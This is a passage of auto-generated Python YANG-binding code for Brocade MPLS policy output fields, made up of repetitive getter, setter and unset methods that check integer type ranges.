'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="policy-cspf-interface-constraint", rest_name="policy-cspf-interface-constraint", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)""",
})
self.__policy_cspf_interface_constraint = t
if hasattr(self, '_set'):
self._set()
def _unset_policy_cspf_interface_constraint(self):
self.__policy_cspf_interface_constraint = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="policy-cspf-interface-constraint", rest_name="policy-cspf-interface-constraint", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)
def _get_policy_cspf_group_computation_mode(self):
"""
Getter method for policy_cspf_group_computation_mode, mapped from YANG variable /brocade_mpls_rpc/show_mpls_policy/output/mpls_policy/policy_cspf_group_computation_mode (uint8)
YANG Description: CSPF group computation mpde
"""
return self.__policy_cspf_group_computation_mode
def _set_policy_cspf_group_computation_mode(self, v, load=False):
"""
Setter method for policy_cspf_group_computation_mode, mapped from YANG variable /brocade_mpls_rpc/show_mpls_policy/output/mpls_policy/policy_cspf_group_computation_mode (uint8)
If this variable is read-only (config: false) in the
source YANG file, then _set_policy_cspf_group_computation_mode is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_policy_cspf_group_computation_mode() directly.
YANG Description: CSPF group computation mpde
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="policy-cspf-group-computation-mode", rest_name="policy-cspf-group-computation-mode", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """policy_cspf_group_computation_mode must be of a type compatible with uint8""",
'defined-type': "uint8",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="policy-cspf-group-computation-mode", rest_name="policy-cspf-group-computation-mode", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)""",
})
self.__policy_cspf_group_computation_mode = t
if hasattr(self, '_set'):
self._set()
def _unset_policy_cspf_group_computation_mode(self):
self.__policy_cspf_group_computation_mode = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="policy-cspf-group-computation-mode", rest_name="policy-cspf-group-computation-mode", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)
def _get_policy_use_bypass_metric(self):
"""
Getter method for policy_use_bypass_metric, mapped from YANG variable /brocade_mpls_rpc/show_mpls_policy/output/mpls_policy/policy_use_bypass_metric (uint8)
YANG Description: CSPF computation-mode use bypass metric
"""
return self.__policy_use_bypass_metric
def _set_policy_use_bypass_metric(self, v, load=False):
"""
Setter method for policy_use_bypass_metric, mapped from YANG variable /brocade_mpls_rpc/show_mpls_policy/output/mpls_policy/policy_use_bypass_metric (uint8)
If this variable is read-only (config: false) in the
source YANG file, then _set_policy_use_bypass_metric is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_policy_use_bypass_metric() directly.
YANG Description: CSPF computation-mode use bypass metric
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="policy-use-bypass-metric", rest_name="policy-use-bypass-metric", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """policy_use_bypass_metric must be of a type compatible with uint8""",
'defined-type': "uint8",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="policy-use-bypass-metric", rest_name="policy-use-bypass-metric", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)""",
})
self.__policy_use_bypass_metric = t
if hasattr(self, '_set'):
self._set()
def _unset_policy_use_bypass_metric(self):
self.__policy_use_bypass_metric = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="policy-use-bypass-metric", rest_name="policy-use-bypass-metric", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)
def _get_policy_use_bypass_liberal(self):
"""
Getter method for policy_use_bypass_liberal, mapped from YANG variable /brocade_mpls_rpc/show_mpls_policy/output/mpls_policy/policy_use_bypass_liberal (uint8)
YANG Description: CSPF computation-mode use bypass liberal
"""
return self.__policy_use_bypass_liberal
def _set_policy_use_bypass_liberal(self, v, load=False):
"""
Setter method for policy_use_bypass_liberal, mapped from YANG variable /brocade_mpls_rpc/show_mpls_policy/output/mpls_policy/policy_use_bypass_liberal (uint8)
If this variable is read-only (config: false) in the
source YANG file, then _set_policy_use_bypass_liberal is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_policy_use_bypass_liberal() directly.
YANG Description: CSPF computation-mode use bypass liberal
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="policy-use-bypass-liberal", rest_name="policy-use-bypass-liberal", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """policy_use_bypass_liberal must be of a type compatible with uint8""",
'defined-type': "uint8",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="policy-use-bypass-liberal", rest_name="policy-use-bypass-liberal", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)""",
})
self.__policy_use_bypass_liberal = t
if hasattr(self, '_set'):
self._set()
def _unset_policy_use_bypass_liberal(self):
self.__policy_use_bypass_liberal = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="policy-use-bypass-liberal", rest_name="policy-use-bypass-liberal", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)
def _get_policy_implicite_commit(self):
"""
Getter method for policy_implicite_commit, mapped from YANG variable /brocade_mpls_rpc/show_mpls_policy/output/mpls_policy/policy_implicite_commit (uint32)
YANG Description: MPLS implicite commit flags
"""
return self.__policy_implicite_commit
def _set_policy_implicite_commit(self, v, load=False):
"""
Setter method for policy_implicite_commit, mapped from YANG variable /brocade_mpls_rpc/show_mpls_policy/output/mpls_policy/policy_implicite_commit (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_policy_implicite_commit is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_policy_implicite_commit() directly.
YANG Description: MPLS implicite commit flags
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="policy-implicite-commit", rest_name="policy-implicite-commit", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """policy_implicite_commit must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="policy-implicite-commit", rest_name="policy-implicite-commit", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)""",
})
self.__policy_implicite_commit = t
if hasattr(self, '_set'):
self._set()
def _unset_policy_implicite_commit(self):
self.__policy_implicite_commit = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="policy-implicite-commit", rest_name="policy-implicite-commit", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
def _get_policy_label_propagate_ttl(self):
"""
Getter method for policy_label_propagate_ttl, mapped from YANG variable /brocade_mpls_rpc/show_mpls_policy/output/mpls_policy/policy_label_propagate_ttl (uint8)
YANG Description: TTL propagation for MPLS label
"""
return self.__policy_label_propagate_ttl
def _set_policy_label_propagate_ttl(self, v, load=False):
"""
Setter method for policy_label_propagate_ttl, mapped from YANG variable /brocade_mpls_rpc/show_mpls_policy/output/mpls_policy/policy_label_propagate_ttl (uint8)
If this variable is read-only (config: false) in the
source YANG file, then _set_policy_label_propagate_ttl is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_policy_label_propagate_ttl() directly.
YANG Description: TTL propagation for MPLS label
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="policy-label-propagate-ttl", rest_name="policy-label-propagate-ttl", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """policy_label_propagate_ttl must be of a type compatible with uint8""",
'defined-type': "uint8",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="policy-label-propagate-ttl", rest_name="policy-label-propagate-ttl", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)""",
})
self.__policy_label_propagate_ttl = t
if hasattr(self, '_set'):
self._set()
def _unset_policy_label_propagate_ttl(self):
self.__policy_label_propagate_ttl = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="policy-label-propagate-ttl", rest_name="policy-label-propagate-ttl", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)
def _get_policy_vrf_propagate_ttl(self):
"""
Getter method for policy_vrf_propagate_ttl, mapped from YANG variable /brocade_mpls_rpc/show_mpls_policy/output/mpls_policy/policy_vrf_propagate_ttl (uint8)
YANG Description: TTL propagation for MPLS label for IPVPN
"""
return self.__policy_vrf_propagate_ttl
def _set_policy_vrf_propagate_ttl(self, v, load=False):
"""
Setter method for policy_vrf_propagate_ttl, mapped from YANG variable /brocade_mpls_rpc/show_mpls_policy/output/mpls_policy/policy_vrf_propagate_ttl (uint8)
If this variable is read-only (config: false) in the
source YANG file, then _set_policy_vrf_propagate_ttl is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_policy_vrf_propagate_ttl() directly.
YANG Description: TTL propagation for MPLS label for IPVPN
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="policy-vrf-propagate-ttl", rest_name="policy-vrf-propagate-ttl", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """policy_vrf_propagate_ttl must be of a type compatible with uint8""",
'defined-type': "uint8",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="policy-vrf-propagate-ttl", rest_name="policy-vrf-propagate-ttl", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)""",
})
self.__policy_vrf_propagate_ttl = t
if hasattr(self, '_set'):
self._set()
def _unset_policy_vrf_propagate_ttl(self):
self.__policy_vrf_propagate_ttl = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="policy-vrf-propagate-ttl", rest_name="policy-vrf-propagate-ttl", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)
def _get_policy_propagate_ttl(self):
"""
Getter method for policy_propagate_ttl, mapped from YANG variable /brocade_mpls_rpc/show_mpls_policy/output/mpls_policy/policy_propagate_ttl (uint8)
YANG Description: TTL propagation for IPoMPLS
"""
return self.__policy_propagate_ttl
def _set_policy_propagate_ttl(self, v, load=False):
"""
Setter method for policy_propagate_ttl, mapped from YANG variable /brocade_mpls_rpc/show_mpls_policy/output/mpls_policy/policy_propagate_ttl (uint8)
If this variable is read-only (config: false) in the
source YANG file, then _set_policy_propagate_ttl is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_policy_propagate_ttl() directly.
YANG Description: TTL propagation for IPoMPLS
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="policy-propagate-ttl", rest_name="policy-propagate-ttl", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """policy_propagate_ttl must be of a type compatible with uint8""",
'defined-type': "uint8",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="policy-propagate-ttl", rest_name="policy-propagate-ttl", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)""",
})
self.__policy_propagate_ttl = t
if hasattr(self, '_set'):
self._set()
def _unset_policy_propagate_ttl(self):
self.__policy_propagate_ttl = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="policy-propagate-ttl", rest_name="policy-propagate-ttl", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)
def _get_policy_rtm_route_filter_enabled(self):
"""
Getter method for policy_rtm_route_filter_enabled, mapped from YANG variable /brocade_mpls_rpc/show_mpls_policy/output/mpls_policy/policy_rtm_route_filter_enabled (uint8)
YANG Description: Inter-AS route filtering
"""
return self.__policy_rtm_route_filter_enabled
def _set_policy_rtm_route_filter_enabled(self, v, load=False):
"""
Setter method for policy_rtm_route_filter_enabled, mapped from YANG variable /brocade_mpls_rpc/show_mpls_policy/output/mpls_policy/policy_rtm_route_filter_enabled (uint8)
If this variable is read-only (config: false) in the
source YANG file, then _set_policy_rtm_route_filter_enabled is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_policy_rtm_route_filter_enabled() directly.
YANG Description: Inter-AS route filtering
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="policy-rtm-route-filter-enabled", rest_name="policy-rtm-route-filter-enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """policy_rtm_route_filter_enabled must be of a type compatible with uint8""",
'defined-type': "uint8",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="policy-rtm-route-filter-enabled", rest_name="policy-rtm-route-filter-enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)""",
})
self.__policy_rtm_route_filter_enabled = t
if hasattr(self, '_set'):
self._set()
def _unset_policy_rtm_route_filter_enabled(self):
self.__policy_rtm_route_filter_enabled = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="policy-rtm-route-filter-enabled", rest_name="policy-rtm-route-filter-enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)
def _get_policy_rtm_route_filter_all_ibgp_enabled(self):
"""
Getter method for policy_rtm_route_filter_all_ibgp_enabled, mapped from YANG variable /brocade_mpls_rpc/show_mpls_policy/output/mpls_policy/policy_rtm_route_filter_all_ibgp_enabled (uint8)
YANG Description: Intra-AS iBGP route filtering
"""
return self.__policy_rtm_route_filter_all_ibgp_enabled
def _set_policy_rtm_route_filter_all_ibgp_enabled(self, v, load=False):
"""
Setter method for policy_rtm_route_filter_all_ibgp_enabled, mapped from YANG variable /brocade_mpls_rpc/show_mpls_policy/output/mpls_policy/policy_rtm_route_filter_all_ibgp_enabled (uint8)
If this variable is read-only (config: false) in the
source YANG file, then _set_policy_rtm_route_filter_all_ibgp_enabled is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_policy_rtm_route_filter_all_ibgp_enabled() directly.
YANG Description: Intra-AS iBGP route filtering
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="policy-rtm-route-filter-all-ibgp-enabled", rest_name="policy-rtm-route-filter-all-ibgp-enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """policy_rtm_route_filter_all_ibgp_enabled must be of a type compatible with uint8""",
'defined-type': "uint8",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="policy-rtm-route-filter-all-ibgp-enabled", rest_name="policy-rtm-route-filter-all-ibgp-enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)""",
})
self.__policy_rtm_route_filter_all_ibgp_enabled = t
if hasattr(self, '_set'):
self._set()
def _unset_policy_rtm_route_filter_all_ibgp_enabled(self):
self.__policy_rtm_route_filter_all_ibgp_enabled = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="policy-rtm-route-filter-all-ibgp-enabled", rest_name="policy-rtm-route-filter-all-ibgp-enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)
def _get_policy_load_interval(self):
"""
Getter method for policy_load_interval, mapped from YANG variable /brocade_mpls_rpc/show_mpls_policy/output/mpls_policy/policy_load_interval (uint16)
YANG Description: Polling interval for MPLS LSP traffic statistics in seconds
"""
return self.__policy_load_interval
def _set_policy_load_interval(self, v, load=False):
"""
Setter method for policy_load_interval, mapped from YANG variable /brocade_mpls_rpc/show_mpls_policy/output/mpls_policy/policy_load_interval (uint16)
If this variable is read-only (config: false) in the
source YANG file, then _set_policy_load_interval is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_policy_load_interval() directly.
YANG Description: Polling interval for MPLS LSP traffic statistics in seconds
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="policy-load-interval", rest_name="policy-load-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint16', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """policy_load_interval must be of a type compatible with uint16""",
'defined-type': "uint16",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="policy-load-interval", rest_name="policy-load-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint16', is_config=True)""",
})
self.__policy_load_interval = t
if hasattr(self, '_set'):
self._set()
def _unset_policy_load_interval(self):
self.__policy_load_interval = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="policy-load-interval", rest_name="policy-load-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint16', is_config=True)
def _get_policy_ingress_tnnl_accounting(self):
"""
Getter method for policy_ingress_tnnl_accounting, mapped from YANG variable /brocade_mpls_rpc/show_mpls_policy/output/mpls_policy/policy_ingress_tnnl_accounting (uint8)
YANG Description: Ingress tunnel accounting
"""
return self.__policy_ingress_tnnl_accounting
def _set_policy_ingress_tnnl_accounting(self, v, load=False):
"""
Setter method for policy_ingress_tnnl_accounting, mapped from YANG variable /brocade_mpls_rpc/show_mpls_policy/output/mpls_policy/policy_ingress_tnnl_accounting (uint8)
If this variable is read-only (config: false) in the
source YANG file, then _set_policy_ingress_tnnl_accounting is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_policy_ingress_tnnl_accounting() directly.
YANG Description: Ingress tunnel accounting
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="policy-ingress-tnnl-accounting", rest_name="policy-ingress-tnnl-accounting", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """policy_ingress_tnnl_accounting must be of a type compatible with uint8""",
'defined-type': "uint8",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="policy-ingress-tnnl-accounting", rest_name="policy-ingress-tnnl-accounting", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)""",
})
self.__policy_ingress_tnnl_accounting = t
if hasattr(self, '_set'):
self._set()
def _unset_policy_ingress_tnnl_accounting(self):
self.__policy_ingress_tnnl_accounting = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="policy-ingress-tnnl-accounting", rest_name="policy-ingress-tnnl-accounting", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)
def _get_policy_te_policy_ospf(self):
"""
Getter method for policy_te_policy_ospf, mapped from YANG variable /brocade_mpls_rpc/show_mpls_policy/output/mpls_policy/policy_te_policy_ospf (uint8)
YANG Description: MPLS TE is OSPF
"""
return self.__policy_te_policy_ospf
def _set_policy_te_policy_ospf(self, v, load=False):
"""
Setter method for policy_te_policy_ospf, mapped from YANG variable /brocade_mpls_rpc/show_mpls_policy/output/mpls_policy/policy_te_policy_ospf (uint8)
If this variable is read-only (config: false) in the
source YANG file, then _set_policy_te_policy_ospf is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_policy_te_policy_ospf() directly.
YANG Description: MPLS TE is OSPF
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="policy-te-policy-ospf", rest_name="policy-te-policy-ospf", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """policy_te_policy_ospf must be of a type compatible with uint8""",
'defined-type': "uint8",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="policy-te-policy-ospf", rest_name="policy-te-policy-ospf", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)""",
})
self.__policy_te_policy_ospf = t
if hasattr(self, '_set'):
self._set()
def _unset_policy_te_policy_ospf(self):
self.__policy_te_policy_ospf = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="policy-te-policy-ospf", rest_name="policy-te-policy-ospf", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)
def _get_policy_te_policy_isis(self):
"""
Getter method for policy_te_policy_isis, mapped from YANG variable /brocade_mpls_rpc/show_mpls_policy/output/mpls_policy/policy_te_policy_isis (uint8)
YANG Description: MPLS TE 's level
"""
return self.__policy_te_policy_isis
def _set_policy_te_policy_isis(self, v, load=False):
"""
Setter method for policy_te_policy_isis, mapped from YANG variable /brocade_mpls_rpc/show_mpls_policy/output/mpls_policy/policy_te_policy_isis (uint8)
If this variable is read-only (config: false) in the
source YANG file, then _set_policy_te_policy_isis is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_policy_te_policy_isis() directly.
YANG Description: MPLS TE 's level
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="policy-te-policy-isis", rest_name="policy-te-policy-isis", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """policy_te_policy_isis must be of a type compatible with uint8""",
'defined-type': "uint8",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="policy-te-policy-isis", rest_name="policy-te-policy-isis", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)""",
})
self.__policy_te_policy_isis = t
if hasattr(self, '_set'):
self._set()
def _unset_policy_te_policy_isis(self):
self.__policy_te_policy_isis = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="policy-te-policy-isis", rest_name="policy-te-policy-isis", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint8', is_config=True)
def _get_policy_ospf_area_defined(self):
"""
Getter method for policy_ospf_area_defined, mapped from YANG variable /brocade_mpls_rpc/show_mpls_policy/output/mpls_policy/policy_ospf_area_defined (uint8)
YANG Description: MPLS TE ospf area defined
"""
return self.__policy_ospf_area_defined
def _set_policy_ospf_area_defined(self, v, load=False):
"""
